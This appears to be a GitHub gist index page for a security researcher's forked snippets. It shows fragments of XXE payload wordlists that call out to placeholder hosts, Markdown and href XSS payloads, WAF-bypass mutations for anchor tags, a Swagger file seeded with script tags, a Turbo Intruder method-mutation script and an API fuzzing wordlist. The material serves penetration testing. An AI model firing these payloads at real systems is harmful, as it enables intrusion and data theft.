mrrootsec / MutateMethods.py

Created February 15, 2026 04:39 — forked from defparam/MutateMethods.py

Example of using Turbo Intruder in a "listen and attack" mode. Because turbo intruder's jython interpreter is technically inside burp you can have turbo intruder scripts use the plugin API. Here we use burp.IProxyListener to intercept requests and reissue them inside turbo intruder mutating the method.

	from threading import Thread
	import time

	class TrafficMagnet(burp.IProxyListener):
	def __init__(self):
	callbacks.registerProxyListener(self)
	self._helpers = callbacks.getHelpers()
	self._callbacks = callbacks

mrrootsec / xxe-payloads.txt

Created February 15, 2026 04:38 — forked from honoki/xxe-payloads.txt

XXE bruteforce wordlist including local DTD payloads from https://github.com/GoSecure/dtd-finder

	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x />
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x />
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/>
	<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y

mrrootsec / List of API endpoints & objects

Created August 20, 2025 03:39 — forked from yassineaboukir/List of API endpoints & objects

A list of 3203 common API endpoints and objects designed for fuzzing.

	0
	00
	01
	02
	03
	1
	1.0
	10
	100
	1000

mrrootsec / gist:3c99eecd740983774738950c74ada109

Created July 24, 2025 11:20 — forked from tamzidr/gist:ec225b4b9bc76971e41541cf32e319fc

Markdown XSS Payloads

	Links:

	[Basic](javascript:alert('Basic'))
	[Local Storage](javascript:alert(JSON.stringify(localStorage)))
	[CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive'))
	[URL](javascript://www.google.com%0Aalert('URL'))
	[In Quotes]('javascript:alert("InQuotes")')

	Images:

mrrootsec / README.md

Created June 29, 2025 11:42 — forked from win3zz/README.md

Useful regex patterns to find vulnerabilities in a Java code and Java security code review tools

Useful Regex Patterns to Find Vulnerabilities in Java Code

1. Hardcoded Credentials / Secrets

These patterns look for sensitive information directly embedded in the code.

Generic Passwords / Secrets / Tokens:
- Regex:

mrrootsec / mutation_a.txt

Created June 24, 2025 15:24 — forked from hackerscrolls/mutation_a.txt

Mutation points in <a> tag for WAF bypass

	<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">

	[1]
	Bytes:
	\x09 \x0a \x0c \x0d \x20 \x2f

	<a/href="javascript:alert(1)">
	<a\x09href="javascript:alert(1)">

	[2,3]

mrrootsec / href_bypass.html

Created April 10, 2025 06:15 — forked from hackerscrolls/href_bypass.html

XSS payloads for href

	<!--javascript -->
	ja&Tab;vascript:alert(1)
	ja&NewLine;vascript:alert(1)
	ja vascript:alert(1)
	javascript:alert()

	<!--::colon:: -->
	javascript&colon;alert()
	javascript:alert()
	javascript:alert(1)

mrrootsec / getRawPageContent

Last active July 24, 2025 07:35 — forked from henningpohl/getRawPageContent

Bookmarklet to crawl a page for iframes, embeds and links and render those as easy to access list.

	(function(){
	// http://coding.smashingmagazine.com/2010/05/23/make-your-own-bookmarklets-with-jquery/
	// http://subsimple.com/bookmarklets/jsbuilder.htm

	if(window.jQuery === undefined) {
	var script = document.createElement("script");
	script.src = "https://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js";
	script.onload = script.onreadystatechange = function() {
	bookmarklet();
	};

mrrootsec / python-venv-tutorial.md

Created November 14, 2024 05:33 — forked from ryumada/python-venv-tutorial.md

Python Virtual Environment Tutorial

How to start Python Development with Python Environment
2. Installing a package using specific version

mrrootsec / ponelat-evil-xss.swagger.json

Created September 18, 2024 15:50 — forked from shockey/ponelat-evil-xss.swagger.json

	{
	"swagger" : "2.0",
	"info" : {
	"version" : "1.0.100",
	"title" : "title<script language=\"javascript\">alert('1')</script>",
	"description" : "description with markdown format <script language=\"javascript\">alert('script-in-description')</script> <img src=x onerror=alert(\"img-in-description\")>"
	},
	"tags" : [ {
	"name" : "Admin",
	"description" : "tag with markdown"

MOHAMMAD SAQLAIN mrrootsec

Useful Regex Patterns to Find Vulnerabilities in Java Code

1. Hardcoded Credentials / Secrets

Python Virtual Environment Tutorial